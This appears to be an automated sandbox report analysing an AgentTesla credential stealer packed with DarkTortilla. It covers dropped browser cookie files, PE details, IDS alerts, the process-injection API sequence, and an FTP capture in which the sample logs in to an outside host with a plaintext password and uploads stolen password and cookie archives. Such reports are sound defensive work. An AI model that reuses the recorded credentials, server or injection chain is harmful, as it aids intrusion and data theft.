                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.8508558324143882
                              Encrypted:false
                              SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                              MD5:933D6D14518371B212F36C3835794D75
                              SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                              SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                              SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\zhxzqq0h.p3l\Edge Chromium\Default\Network\Cookies

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.6732424250451717
                              Encrypted:false
                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\zhxzqq0h.p3l\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:modified
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.17378132360892
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:tTXQS6DONV.exe
                              File size:832'000 bytes
                              MD5:2788e0e233dfa0671c63179549ad16ed
                              SHA1:d9edf6671d0e7abf960a1c5dc8c6a126ec8f2c23
                              SHA256:5b79bb5c716c9797e048785965be3c3a54a73a587d23d0027130cb31b618e124
                              SHA512:359e41da27a9e214d2d08eb8f340a6951a53a717078254cf4889e039c9cbc86e7f159fb2c94fa1f9f49d6f80d2fa667f67f7084d074f6a82726578c8c5f6a6da
                              SSDEEP:12288:o53yuZG8+De1kIse8LRWjrZCollIoNE8krZu3zvK541r8m:o53yuZGVteKRyjl6ikdCzvy41r
                              TLSH:3105F18C03FCAAA0F97E2BB5C57611444B74B447B872E35C46C090FA6E73BE19992763
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-e................................. ........@.. ....................... ............`................................

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x4cc8fe
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x652DFCF2 [Tue Oct 17 03:18:10 2023 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xcc8ac0x4f.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x3c4.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xca9040xcaa001b3e31a2473c164883787f4367ae59c0False0.7668648307371992data7.181596373025786IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0xce0000x3c40x4002800b6122761f81bd5ccb26731108a6bFalse0.4169921875data3.3057956221571367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xd00000xc0x200d9965fe73f81b8deb70ddf0299a784b0False0.041015625data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0xce0580x36cdata0.4463470319634703

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-05T17:15:13.897832+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.649872162.241.203.3021TCP
                              2024-12-05T17:15:14.830894+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.649881162.241.203.3034513TCP
                              2024-12-05T17:15:14.951271+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.649881162.241.203.3034513TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:15:10.394269943 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:10.514098883 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:10.514316082 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:11.669972897 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:11.670293093 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:11.790064096 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:12.005503893 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:12.005969048 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:12.125976086 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:12.443470001 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:12.443891048 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:12.563711882 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:12.775660038 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:12.775881052 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:12.898402929 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:13.110002995 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:13.110349894 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:13.231758118 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:13.443512917 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:13.443684101 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:13.563479900 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:13.776614904 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:13.777550936 CET4988134513192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:13.820777893 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:13.897495985 CET3451349881162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:13.897665024 CET4988134513192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:13.897831917 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:14.017859936 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:14.830497026 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:14.830893993 CET4988134513192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:14.830986977 CET4988134513192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:14.883245945 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:14.950895071 CET3451349881162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:14.951195955 CET3451349881162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:14.951271057 CET4988134513192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:15.163136959 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:15.211391926 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:15.215975046 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:15.335758924 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:15.550373077 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:15.551079035 CET4988733983192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:15.602014065 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:15.670902014 CET3398349887162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:15.671192884 CET4988733983192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:15.671236992 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:15.791054010 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:16.602121115 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:16.602456093 CET4988733983192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:16.602456093 CET4988733983192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:16.648971081 CET4987221192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:16.722573996 CET3398349887162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:16.722589970 CET3398349887162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:16.722604036 CET3398349887162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:16.723237991 CET3398349887162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:16.723299980 CET4988733983192.168.2.6162.241.203.30
                              Dec 5, 2024 17:15:16.935152054 CET2149872162.241.203.30192.168.2.6
                              Dec 5, 2024 17:15:16.977026939 CET4987221192.168.2.6162.241.203.30

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:15:09.886590004 CET5653453192.168.2.61.1.1.1
                              Dec 5, 2024 17:15:10.379842043 CET53565341.1.1.1192.168.2.6

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 5, 2024 17:15:09.886590004 CET192.168.2.61.1.1.10x8975Standard query (0)ftp.aminhacorretora.com.brA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 5, 2024 17:15:10.379842043 CET1.1.1.1192.168.2.60x8975No error (0)ftp.aminhacorretora.com.braminhacorretora.com.brCNAME (Canonical name)IN (0x0001)false
                              Dec 5, 2024 17:15:10.379842043 CET1.1.1.1192.168.2.60x8975No error (0)aminhacorretora.com.br162.241.203.30A (IP address)IN (0x0001)false

                              FTP Packets

                              TimestampSource PortDest PortSource IPDest IPCommands
                              Dec 5, 2024 17:15:11.669972897 CET2149872162.241.203.30192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:15. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:15. Server port: 21.220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:15. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Dec 5, 2024 17:15:11.670293093 CET4987221192.168.2.6162.241.203.30USER logsftp@aminhacorretora.com.br
                              Dec 5, 2024 17:15:12.005503893 CET2149872162.241.203.30192.168.2.6331 User logsftp@aminhacorretora.com.br OK. Password required
                              Dec 5, 2024 17:15:12.005969048 CET4987221192.168.2.6162.241.203.30PASS _yA=,M5*J?KH
                              Dec 5, 2024 17:15:12.443470001 CET2149872162.241.203.30192.168.2.6230 OK. Current restricted directory is /
                              Dec 5, 2024 17:15:12.775660038 CET2149872162.241.203.30192.168.2.6504 Unknown command
                              Dec 5, 2024 17:15:12.775881052 CET4987221192.168.2.6162.241.203.30PWD
                              Dec 5, 2024 17:15:13.110002995 CET2149872162.241.203.30192.168.2.6257 "/" is your current location
                              Dec 5, 2024 17:15:13.110349894 CET4987221192.168.2.6162.241.203.30TYPE I
                              Dec 5, 2024 17:15:13.443512917 CET2149872162.241.203.30192.168.2.6200 TYPE is now 8-bit binary
                              Dec 5, 2024 17:15:13.443684101 CET4987221192.168.2.6162.241.203.30PASV
                              Dec 5, 2024 17:15:13.776614904 CET2149872162.241.203.30192.168.2.6227 Entering Passive Mode (162,241,203,30,134,209)
                              Dec 5, 2024 17:15:13.897831917 CET4987221192.168.2.6162.241.203.30STOR PW_user-124406_2024_12_05_11_15_08.html
                              Dec 5, 2024 17:15:14.830497026 CET2149872162.241.203.30192.168.2.6150 Accepted data connection
                              Dec 5, 2024 17:15:15.163136959 CET2149872162.241.203.30192.168.2.6226-File successfully transferred
                              226-File successfully transferred226 0.332 seconds (measured here), 0.95 Kbytes per second
                              Dec 5, 2024 17:15:15.215975046 CET4987221192.168.2.6162.241.203.30PASV
                              Dec 5, 2024 17:15:15.550373077 CET2149872162.241.203.30192.168.2.6227 Entering Passive Mode (162,241,203,30,132,191)
                              Dec 5, 2024 17:15:15.671236992 CET4987221192.168.2.6162.241.203.30STOR CO_user-124406_2024_12_05_11_15_14.zip
                              Dec 5, 2024 17:15:16.602121115 CET2149872162.241.203.30192.168.2.6150 Accepted data connection
                              Dec 5, 2024 17:15:16.935152054 CET2149872162.241.203.30192.168.2.6226-File successfully transferred
                              226-File successfully transferred226 0.333 seconds (measured here), 10.12 Kbytes per second

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:1
                              Start time:11:13:57
                              Start date:05/12/2024
                              Path:C:\Users\user\Desktop\tTXQS6DONV.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\tTXQS6DONV.exe"
                              Imagebase:0xe90000
                              File size:832'000 bytes
                              MD5 hash:2788E0E233DFA0671C63179549AD16ED
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.2881532887.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:5
                              Start time:11:14:35
                              Start date:05/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0xe70000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.3406296559.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:19.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:8.5%
                                Total number of Nodes:106
                                Total number of Limit Nodes:6
                                execution_graph 41904 7b9f4b8 41905 7b9f643 41904->41905 41907 7b9f4de 41904->41907 41907->41905 41908 7b9e138 41907->41908 41909 7b9f738 PostMessageW 41908->41909 41910 7b9f7a4 41909->41910 41910->41907 41945 7b9f298 41946 7b9f2d8 ResumeThread 41945->41946 41948 7b9f309 41946->41948 41949 7b9d818 41950 7b9d85d Wow64GetThreadContext 41949->41950 41952 7b9d8a5 41950->41952 41911 55a4a58 41912 55a4a82 41911->41912 41916 55abdb8 41912->41916 41920 55abda9 41912->41920 41913 55aa21c 41925 55abf30 41916->41925 41929 55abf04 41916->41929 41917 55abdd2 41917->41913 41921 55abdb8 41920->41921 41923 55abf30 DeleteFileW 41921->41923 41924 55abf04 DeleteFileW 41921->41924 41922 55abdd2 41922->41913 41923->41922 41924->41922 41926 55abf47 41925->41926 41933 55ac298 41926->41933 41930 55abefd 41929->41930 41930->41929 41932 55ac298 DeleteFileW 41930->41932 41931 55ac1e1 41931->41917 41932->41931 41934 55ac2af 41933->41934 41937 55a0428 41934->41937 41938 55ac5f8 DeleteFileW 41937->41938 41940 55ac1e1 41938->41940 41940->41917 41953 742ada0 41954 742adb4 41953->41954 41955 742ae2d 41954->41955 41963 7b92aeb 41954->41963 41967 7b93597 41954->41967 41971 7b94527 41954->41971 41975 7b92e02 41954->41975 41979 7b935ec 41954->41979 41983 7b9377d 41954->41983 41987 7b92c9d 41954->41987 41991 7b94a48 41963->41991 41994 7b94a40 41963->41994 41964 7b92afc 41969 7b94a48 VirtualProtect 41967->41969 41970 7b94a40 VirtualProtect 41967->41970 41968 7b935ab 41969->41968 41970->41968 41973 7b94a48 VirtualProtect 41971->41973 41974 7b94a40 VirtualProtect 41971->41974 41972 7b94538 41973->41972 41974->41972 41977 7b94a48 VirtualProtect 41975->41977 41978 7b94a40 VirtualProtect 41975->41978 41976 7b92e13 41977->41976 41978->41976 41981 7b94a48 VirtualProtect 41979->41981 41982 7b94a40 VirtualProtect 41979->41982 41980 7b9362a 41981->41980 41982->41980 41985 7b94a48 VirtualProtect 41983->41985 41986 7b94a40 VirtualProtect 41983->41986 41984 7b93797 41985->41984 41986->41984 41989 7b94a48 VirtualProtect 41987->41989 41990 7b94a40 VirtualProtect 41987->41990 41988 7b92cc1 41989->41988 41990->41988 41992 7b94a90 VirtualProtect 41991->41992 41993 7b94aca 41992->41993 41993->41964 41995 7b94a47 VirtualProtect 41994->41995 41997 7b94aca 41995->41997 41997->41964 42002 cc1738 42003 cc173c 42002->42003 42004 cc1760 42003->42004 42007 cc178b 42003->42007 42012 cc17a0 42003->42012 42008 cc17ae 42007->42008 42011 cc17cd 42007->42011 42017 cc0850 42008->42017 42011->42004 42013 cc17ae 42012->42013 42016 cc17cd 42012->42016 42014 cc0850 CloseHandle 42013->42014 42015 cc17c9 42014->42015 42015->42004 42016->42004 42018 cc1d20 CloseHandle 42017->42018 42019 cc17c9 42018->42019 42019->42004 41941 7b9f030 41942 7b9f075 Wow64SetThreadContext 41941->41942 41944 7b9f0bd 41942->41944 41998 7b9ed90 41999 7b9edd8 VirtualProtectEx 41998->41999 42001 7b9ee16 41999->42001 42020 7b96dc0 42021 7b96df3 42020->42021 42022 7b98788 42021->42022 42024 7b998d0 42021->42024 42026 7b998f7 42024->42026 42025 7b999bb 42025->42021 42026->42025 42028 7b9bc58 42026->42028 42029 7b9bcd7 CreateProcessAsUserW 42028->42029 42031 7b9bdd8 42029->42031 42032 7b9df00 42033 7b9df40 VirtualAllocEx 42032->42033 42035 7b9df7d 42033->42035 42036 7b9e640 42037 7b9e688 WriteProcessMemory 42036->42037 42039 7b9e6df 42037->42039 42040 742be38 42041 742be80 VirtualProtect 42040->42041 42042 742beba 42041->42042

                                Executed Functions

                                Function 05E74535 Relevance: 5.5, Instructions: 5513COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 5e74535-5e74797 29 5e767fd-5e76aab 0->29 30 5e7479d-5e754b0 0->30 97 5e76ab1-5e77988 29->97 98 5e77990-5e7892a 29->98 429 5e754b6-5e75828 30->429 430 5e75830-5e767f5 30->430 97->98 659 5e78cb0-5e78cc3 98->659 660 5e78930-5e78ca8 98->660 429->430 430->29 664 5e79305-5e7a197 659->664 665 5e78cc9-5e792fd 659->665 660->659 1048 5e7a197 call 5e7bc50 664->1048 1049 5e7a197 call 5e7bc1d 664->1049 1050 5e7a197 call 5e7bc2c 664->1050 665->664 1046 5e7a19d-5e7a1a4 1048->1046 1049->1046 1050->1046
                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbde6baf714d68530db6f30d2642d2712452995b365dc7f251ac53a26610ac1f
                                • Instruction ID: e2485a3803e863381aa82a56731007734512a108523fab92558fbbf64e438d05
                                • Opcode Fuzzy Hash: cbde6baf714d68530db6f30d2642d2712452995b365dc7f251ac53a26610ac1f
                                • Instruction Fuzzy Hash: 8CB32670A166198BDB28FF79E99966CBBF2BB89301F4045E9D089A7350DF305D84CF81
                                Function 05E74560 Relevance: 5.5, Instructions: 5499COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1051 5e74560-5e74797 1079 5e767fd-5e76aab 1051->1079 1080 5e7479d-5e754b0 1051->1080 1147 5e76ab1-5e77988 1079->1147 1148 5e77990-5e7892a 1079->1148 1479 5e754b6-5e75828 1080->1479 1480 5e75830-5e767f5 1080->1480 1147->1148 1709 5e78cb0-5e78cc3 1148->1709 1710 5e78930-5e78ca8 1148->1710 1479->1480 1480->1079 1714 5e79305-5e7a197 1709->1714 1715 5e78cc9-5e792fd 1709->1715 1710->1709 2098 5e7a197 call 5e7bc50 1714->2098 2099 5e7a197 call 5e7bc1d 1714->2099 2100 5e7a197 call 5e7bc2c 1714->2100 1715->1714 2096 5e7a19d-5e7a1a4 2098->2096 2099->2096 2100->2096
                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
